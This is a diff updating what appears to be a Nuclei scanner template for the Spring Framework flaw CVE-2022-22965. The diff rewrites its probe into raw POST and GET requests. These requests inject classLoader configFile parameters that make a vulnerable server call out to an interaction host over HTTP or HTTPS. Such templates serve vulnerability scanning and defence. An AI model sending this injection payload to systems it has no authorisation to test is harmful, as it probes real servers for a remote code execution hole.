Updated CVE-2022-22965.yaml

cves/2022/CVE-2022-22965.yaml

@@ -21,19 +21,19 @@ info:
   tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx"
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded
 
-  - method: POST
-    path:
-      - "{{BaseURL}}"
+        class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
 
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-
-    body: |
-      class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
+      - |
+        GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
+    payloads:
+      interact_protocol:
+        - http
+        - https
 
     matchers-condition: and
     matchers:
@@ -47,5 +47,3 @@ requests:
         words:
           - "User-Agent: Java"
         case-insensitive: true
-
-# Enhanced by mp on 2022/05/19